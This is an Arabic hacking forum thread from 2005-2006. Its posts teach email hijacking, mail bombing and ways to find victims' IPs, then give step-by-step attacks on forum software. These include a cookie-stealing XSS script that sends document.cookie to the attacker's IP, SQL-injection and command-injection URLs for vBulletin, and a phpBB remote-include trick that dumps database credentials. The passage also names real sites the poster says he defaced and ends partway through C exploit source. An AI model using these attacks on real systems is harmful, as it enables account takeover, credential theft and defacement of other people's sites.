وتخبره عن تجديدات سوف يقوم بها شركة الهوتميل ويجب ان يرسل كلمة المرور
على الايميل اللي انت فتحته ونفرض مثلا
user_hotmail_pass@hotmail.com
وابو الشباب راح يرسلك رساله ويشكرك بعد
اليست طريقه رائعه؟؟؟؟ لكنها قديمه وما تمشي على الهكرز
عاد انت حاول انك تجد فكره ذكيه من مخك المليء بالافكار
==================================================
=========
}{اختراق الايميل}{
5- عن طريق ثغره بالشركه التي تريد منها الايميل تقولي كيف انا اقولك كيف
هذا اصعب طريقه من بين الطرق لكن اضمن طريقه
هناك بمايسمى بالاختراق الجزيء للموقع اي تخترق جزيء بسيط من الموقع
فهذا هو المطلوب وهو اختراق جزيء لشركة الهوتميل مثلا
طبعا عن طريق المنفذ 25 والياهو ايضا عن طريق 110 طبعا
والطريقه ان تكتشف ثغره بالموقع عاد
عن طريق هذه الثغره طبعا من الاختراق الجزيء هذا
تكون لك الاحقيه فقط في الايميلات يعني معرفة الرسائل الموجوده
والمعلومات كلمات السر اما غير ذلك فلا يعني لا تستطيع ان تتعدى حدودك خارج الايميل
يعني تغير الاندكس حقت الهوتميل
لا يا بابا هذا صعب شوي
يبي لك تخترق الهوتميل بكبره
==================================================
=========
}{كود الجافا}{
6- عن طريق ارسال كود طبعا انت تتسال وشو هذا الكود هذا كود جافا او اكتيف اكس ورح ارسل الكود
للايميل فيستقبلها فتعطيه بعض الخدع مثلا اذا فتحت ايميلك يقول اكتب كلمة السر من جديد ومن هذا
الكلام
وتجيك رساله على الطاير لايميلك تخبرك انك انت ارسلت رساله للشخص وان الشخص
قام بفتح ايميله وهذا اسم ايميله
مثلا some_one@hotmail.com
ورقم الباسورد
12345678
طبعا انت تتسال وشو هذا الكود راح اترك الجواب لنفسك بعد تعلم لغات البرمجه
ولكي اسهل لك العمليه اكثر لغة الجافا
فا انت سوف تعرف الجواب
طيب جرب هذا الكود وقولي ايش صار
<HTML>
>a herf="file:c:concon"(نص الرسالة)<a>
<HTML>
سؤال يدور في ذهنك ما ذا يفعل هذا الامر؟؟
الجواب هو يقوم هذا الامر بتقوف النظام مما يضطر صاحب الايميل المرسل اليه
ان يقوم باعادة الجهاز من جديد
لاحول ولا قوة الا بالله
طبعا هذا الامر اذا استخدمه ما ينفع الا على الهوتميل والياهو تبيني اقولك ليش اقولك ليش
لان الياهو والهوتميل يستخدم خاصية html وبذلك تعمل هذه الاكواد
==================================================
========
}{زرع الباتشات في المتصفح}{
7- عن طريق برامج تزرع بالمتصفح باتشات وتحمل بجهاز الضحيه فتفتح في جهازه وترسل الى بريد
وطبعا هذه الطريقه عن طريق برامج ومن اشهرها
good will
طبعا انت سو صفحه بهذا البرنامج
مثلا اكتب قصه قتل او نكت كثيره اهم شيء انك تلهي هذا الشخص
كي يطول هذا الشخص في الموقع وطبعا انت ما راح تحط باتش او سيرفر
حجمه اميجا
لا انت ضع باتش حجمه 24 كيلوبايت لكي يسهل تحميله بجهاز الضحيه
والبرنامج كما هو معروف هو k2ps فهذا البرنامج حمله على الصفحه وبكذا تجيك رساله بالايميل
بس المشكله ان برامج كاشفات الفايروسات مثل المكافي والانتي فايروس تكشف مثل هذه اللعبه
==================================================
========
}{تفجير الايميل}{
8- هناك برامج تسمى بـ
BOMB MAIL
اي تفجير الايميل فعمل هذه البرامج ارسال حتى يتوقف عمل الايميل
فمن هذه البرامج
Euthan و Kaboom و Aenima
فانا والله العالم ارسلت تقريبا لا احد
الايميلات طبعا بريدي
ارسلت تقريبا ما يعادل 200 الف رساله طيب وين اللي يقولون يتفجر الايميل ويتعطل بالعكس الايميل
يشتغل اخر حلاوه وعلى والايميل اللي ارسلته على الهوتميل ومساحته 6ميجا لا لا الايميل لا يتفجر على حسب
معلوماتي الا اذا تعدى العدد الذي وصلته انا هذا والله اعلم لكن هذه الطريقه ليست لاختراق الايميل
وانما لايقاف ايميل الضحيه
اعذروني على التقصير
فهذه معلومات بسيطه بودي ان يعرفها غيري ويستفيد من هذه الملعومات والله بما تعلمون بصير
linkin park
10-18-2006, 06:15 AM
طرق الحصول على الايبي
السلام عليكم إخواني
اليوم جايب شرح قديم بس في هاكر على ما أظن مبتدئين . لازم يعرفو ألعاب وطرق إستخراج الإبي بدون برامج.
طرق الحصول على الأي بي :
الطريقة الاولى
تطلب محادثة بالنت ميتنغ مع من تقوم بالتحدث معه على المسنجر فيصلك الأيبي الخاص بك والأيبي الخاص به
الطريقة الثانية
ارسل رسالة للشخص اللذي تود الحصول على الآي بي الخاص به وتكون الرسالة كالتالي
لنفرض أن إيميل الشخص
sharoon@hotmail.com.
إنت قم بكتابة
sharoon@hotmail.com.confirm.to
ستصلك رسالة على بريدك اللذي ارسلت عندما بفتح رسالتك و ستحتوي الرسالة على الأيبي الخاص بالضحية.
الطريقة الثالثه
عن طريق برنامج الحماية المعروف
ZoneAlarm
تكتب الأيبي الخاص بك على شكل رابط مثل
http://127.0.0.1/
وترسله للضحية, وعندما يضغط الضحية على الرابط سيخبرك أن هناك أيبي يحاول اختراقك, ويعطيك اياه
الطريقه الرابعه
جهز الاعدادات التالية في بريدك
أدخل إلى
Options
ثم إلى
Mail Display Settings
ثم تدخل إلى
Massage Headers
ثم قم بالتأشير على
Advanced
عندما تجري هذه الاعدادات سيصلك الأيبي لأي شخص يرسل لك رسالة
الطريقه الخامسه
أرسل للضحية أي ملف, افتح الدوس ونفذ الأمر
Netstat -n
ستجد آيبي الضحية تحت
Foreign Address
الطريقه السادسه والاحدث والاسهل والاسرع عن طريق هذا الموقع
اقرأ موضوعي عن هذا الموقع
http://www.amman-dj.com/vb/showthread.php?t=8015
الطريقه السابعة:
برنامج : Ass Sniffer 1.0.1
طريقة البرنامج
افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي حقك
بعدين اظغط الزر اللي تحته
convert IP address
بعدين اظغط على الزر Listen
بيجيك وصله تحت تلقاها رقم طويل انسخها و أعطها للضحيية و فور ضغطه على اللنك سيأتي الأي بي في البرنامج... على اليمين..
http://www.geocities.com/HackerZ_master/mesn.zip
الطريقة الثامنه:
و هي عن طريق ال firewall كمان...
و هي أنك تقوم بوضع الحماية على أقصي درجة و عند بعث أي حد ليك سيعلمك ال firewall ان حد يحاول اختراقك و ستجد الأي بي موجود في ال alert
الطريقة التاسعة:
و الطريقة عن طريق ال firewall..
و قم بوضع الأي بي بالطريقة الأتية.. http://xxx.xxx.xxx.xxx/
و عند فتح الضحية للوصلة.. سيقوم ال firewall كـ zone alarm سيقوم بإعلامك أن أحد يحاول اختراقك مع اظهار الأي بي و الشخص المذكور هو من حاول فيتح الوصلة اللي فيها الأي بي بتاعك و طبعا أعطاء الأي بي للضحية فيه نوع من الخطر.. لذا يمكن استخدام برنامج funky url و سيقوم بتشفير الأي بي كالأي بي الأتي:
%31%32%37%2E%30%2E%30%2E%31
و هذا هو الأي بي : 127.0.0.1
لتحميل Funky URL : http://www.geocities.com/rock_mask510/urlencode.zip
تحياتي
linkin park
10-18-2006, 06:35 AM
اقوى برامج تفجير الايميل
احضرت لك اليوم اقوى برامج تفجير الايميل
حملوووو ماتريدون منها
وادعولي علاشان تعبت فيها والله
ادعولي مش تدعو عليه
اسماء الرنامج حسب الترتيب
كليك يمين حفظ بأسم
una bomb (http://www.geocities.com/pal_linux_hacker8/bomb/UnaBomb.zip)
bomber2 (http://www.geocities.com/pal_linux_hacker8/bomb/bombers.zip)
extra email bomber (http://www.geocities.com/pal_linux_hacker8/bomb/extremeMailbomber.zip)
ghost (http://www.geocities.com/pal_linux_hacker8/bomb/ghost.zip)
warfair (http://www.geocities.com/pal_linux_hacker8/bomb/warfair.zip)
xmas (http://www.geocities.com/pal_linux_hacker8/bomb/xmas2000.zip)
z_bomber (http://www.geocities.com/pal_linux_hacker8/bomb/zbomber.zip)
تحياتي
linkin park
10-18-2006, 06:40 AM
جميع طرق إختراق المنتديات + ثغرات جديدة وخطيرة
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الحمد لله رب العالمين و أفضل الصلاة و أتم التسليم على سيدنا محمد صلى الله عليه وعلى آله وصحبه أجمعين أما بعد:
السلام عليكم ورحمة الله وبركاته :
هذا الموضوع يحتوي على معلومات كثيرة ومفيدة لكل الهاكرز وبجميع مستوياتهم فأرجوا منكم أن لا تستخدموا هذه المعلومات في مضرة المسلمين و إيذاء إخوانكم في الدين
ولكن أرجوا أن تستخدموها ضد اليهود وكفار و الرتدين
أولا سم بالله وابدأ :
بسم الله الرحمن الرحيم
جميع طرق اختراق المنتديات
---------
مقدمة :
---------
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>document.write('<img
src="http://my_ip_address/'+document.*****e+'">';***********
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid= (http://www.victim.com/vb/index.php?bbuserid=)&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .
أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين
======================================
إختراق منتديات VP
======================================
اختراق المنتديات بس بمنتديات vb
. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
[U]http://URL/memberlist.php (http://url/memberlist.php)
URL = العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
http://URL/member.php?soitgoe68e45u...info&userid=266 (http://url/member.php?soitgoe68e45u...info&userid=266)
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
http://URL/member.php?soitgoe68e45u...etinfo&userid=1 (http://url/member.php?soitgoe68e45u...etinfo&userid=1)
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
http://URL/member.php?action=login&...VALIDPASS&url=');'.$use rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WH E RE+username='ADMIN'').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE (YOUR@EMAIL.HERE) = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ******* .
8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php (http://url/index.php)
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم
======================================
إختراق منتديات xmb
======================================
تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..
وصف للثغره::
وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر
الأصدار المصاب:::
XMB 1.6 Magic Lantern Final
الشرح والتطبيق:::
جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:
1- عليك بالذهاب الى موقع جو http://www.google.com/ (http://www.google.com/)
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون متل هدا
http://www.******.com/massegboard/index_log.log (http://www.******.com/massegboard/index_log.log)
5- راح ينزل عندك ملف والملف عباره عن ملف مثل الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك متل
هذا مثلا::
xmbuser=admin
واباس راح تلقاه قدامه مثل هذا
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
ftp://www.cafecounterintelligence.com/cci/chigger.exe (ftp://www.cafecounterintelligence.com/cci/chigger.exe)
======================================
إختراق منتديات Web Wiz Guide
======================================
مث http://host.basharnet.com/forum (http://host.basharnet.com/forum)
هذه الطريقة أقدمها لكل الهاكرز المبتدئين لأنها سهلة جدا وما بدا غير تحمل هالملف وتتصفح الباسوورد على كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن الهاكر بقرائتك لهذه الثغرة تستطيع أن تخترق منتدى
أغلب المنتديات مصابة بهذه الثغرة
بسم الله الرحمن الرحيم
الشرح: ثغرة تصيب منتديات Web Wiz Guide
أولا إذهب إلى google
اكتب
Web Wiz forum
وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
admin/ww*******mdb
حمل الملف وادخل عليه عن طريق microsoft office access
بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin
سجل اسمك والباسوورد
الآن أنت في لوحة التحكم
ها ها ها ها
بس ما حدا يخترق المنتديات الوجودة في محرك البحث قوقل التي قمت باختراقها أنا
هذا منتدى قمت باختراقه لاحقا
http://www.plasticcube.com/Forum/default.asp (http://www.plasticcube.com/Forum/default.asp)
اكتبوا فيه ما تشائون يا أعضاء وزوار منتديا عرب للأبد
وهي منندى ثان
هذا منتدى دينيماركي
http://www.naturklub.dk/forum/ (http://www.naturklub.dk/forum/)
ثغرة في معظم منتديات الـ asp
++++++++++++++++++++++++++
سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages
وعليها فقس
طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد بياناتها .
بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما يكروسوفت الا اذا لم يوجد له بديل ...الخ
وتعتمد قواعد بياناتها على ثلاثة أنواع هي :
sqlserver && sql && M.S Access
واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا .
واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي باسم philboard.asp
مثل هذا المنت http://www.khill.co.uk/forum/philboard.asp (http://www.khill.co.uk/forum/philboard.asp)
وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث عن -------------- > philboard وانتظر النتائج ....
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
كيف تحمل قاعدة البيانات ؟
اكتب هذا الامتداد
وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم قاعدة البيانات صغير جدا للتطبيق والتسليم بسرعة
وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات
database/philboard.mdb
وتكتبه بعد اسم الموقع والمنتدى مثل
http://www.khill.co.uk/forum/database/philboard.mdb (http://www.khill.co.uk/forum/database/philboard.mdb)
ولا بد لكي تقرا قاعدة البيانات ان يكون في جهازك برنامج ما يكروسوفت أكسس
وبعد فتح قاعدة البيانات ستجد بداخلها عدة جداول فيها جميع محتويات قاعدة البيانات
من ضمنها وهو المهم جدول المستخدمين ال users
وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد
الآن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟
لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف العام
philboard_admin.asp وهذا عنوانها
مثال
http://www.khill.co.uk/forum/philboard_admin.asp (http://www.khill.co.uk/forum/philboard_admin.asp)
ادخل وستجد كل منتدى وبجانبة كلمه delete و edit
احذف كل المنتديات وأنشا منتديات جديدة واكتب عليها
hacked by xxxxxxxxxx
xxxxxxx يعني اسمك ,,,
من وين ؟
من المربعين الموجودة بالاسفل في لوحة التحكم
اكتب في المستطيل hacked by xxxxxxxxxx
وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع
واضغط add يعني اضافة
ومبرووووووووووووووووووووووووووووووووك ألف مبرووووووووووك اول اختراق لك
والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات لكل منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد
__________________________________________________
تفضلو ثغرة في هاك الرد السريع منتدى PHPBB
عند تركيبك لهاك الرد السريع
سوف تجد هذا الكود
if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}
دقق جيدا بهذا الكود
ثم أنشاء ملف جديد سمه extension.inc
وضع داخلها مثلا
شفرة
<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
يمكنك وض الخيارات التي تود مشاهدتها من الهاك
الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
أتجه الى هذا العنوان
URL: http://[php (http://[php/)BB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
بسهولة أستبدل [phpBB_Forum]
بعنوان المنتدى المستهدف
[Your Server]
بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به
ماذا ترى؟؟؟
معلومات قاعدة البيانات بين ايديك
الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات :
ببساطة أفتح الملف quick_reply.php
أبحث عن
if ( $mode == 'smilies' )
أَضف بعدها مباشرة
phpbb_root_path = "./";
وانشاءالله انحلت المشكلة
_________________
ثغره جديده في منتديات الvb
________________________
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله
لكن هذي كانت على النسخة التجريبية Beta
بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك
طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php
PHP:
--------------------------------------------------------------------------------
From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln
---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.
-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
<a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank"& http://www.vbulletin.com/</a></a>;
---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------
-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;
-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;
-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-
<html>
<body>
<form action="http://[victim]/forum/private.php"&nbs
p;method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post
Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview
Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You
can write your own JS codes
var xss = "\"><script>alert(document.coo
kie)***********";
document.vbform.title.value=xss;
document.vbform.preview.click();
***********
</body>
</html>
*You may need login first
Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer
<a href="http://ferruh.mavituna.com"
target="_blank"><a href="http://ferruh.mavituna.com" target="_blank"& http://ferruh.mavituna.com/</a></a>;
fares125@hotmail.com
--------------------------------------------------------------------------------
ثغره جميله لاختراق منتيات الفورم
____________________________
طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . .
وامتدادها تكون . . .
admin/ww*******mdb
http://www./###.com/forum
تصبح . . .
http://www./###.com/forum/admin/ww*******mdb
طريقه البحث عن الثغره . . . .
http://www.google.com/
وتبحث عن
Web Wiz forum
ويمكنك كتابه
Web Wiz forum 1
Web Wiz forum 2.1
__________________________________________________
___________
ثغرة في منتديات vBulletin في ملفcalendar.php
_ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
http://www.example.com/vb/calendar....mma=";echo'';%20echo%20%60<command>%20 %60;die();echo%22
المتغيرات
1-example.com بإسم الموقع
2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd
______________________________________________
اصحاب القبعة البيضاء
the sniper
عرض الملف الشخصي الخاص بالعضو
إرسال رسالة خاصة إلى the sniper
قم بزيارة الصفحة الشخصية لـ the sniper !
إيجاد المزيد من المشاركات لـ the sniper
إضافة the sniper إلى قائمة الأصدقاء لديك
01-17-2005, 10:18 AM رقم المشاركة : 2
the sniper
عضو
الملف الشخصي
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:
http://vulnerable/forum/memberlist....E********='
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%
2Ephp%3F****%3D%27%2B
escape%28document%2E*****e%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)
You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
******** = "http://www.vbulletin.com/forum/memb...t%3E********%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco
rd%2Ephp%3F****%3D%27
%2Bescape%28document%2E*****e%29%3C%2Fscript%3E"
***********
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/*****e stealing code, and then http://www.swgmotu.com./
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
-----------------------------------------------------------------------------------
منقول من موقع امريكي
___________________________________
ثغرة vbulletin2
gosper is credited with disclosing this to securiteam on 9-24-02 along with a
working exploit and he probably discovered it too. I wrote this because his
exploit didn't URL encode all the characters that needed to be URL encoded
in order for some of the inputted commands to work properly. I added a date
argument which is essential for exploiting the security hole. I also used an
fdopen() and fgets() to make sure all the output was recieved and displayed
correctly, at least I hope it works better . Last thing I built in was HTTP
version 1.1 support so that you can use this against virtual hosts. Yeah... and
you can exploit this with a web browser too, its just easier to use this program,
most of the time.
Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
End of Days, sk3tch and all the people in #ozan http://www.ozane.net/). If I
forgot you, well shit.
Compile: gcc vbcal.c -o vbcal
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#define url1 "calendar.php?calbirthdays=1&action=getday&day ="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"
void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}
void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
exit(0);
}
int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10; /* timeout for connection */
int port = 80; /* 80 default for HTTPD */
char *path = "/"; /* url path, default = "/" */
char *host = NULL, *date = NULL;
char sign = '%';
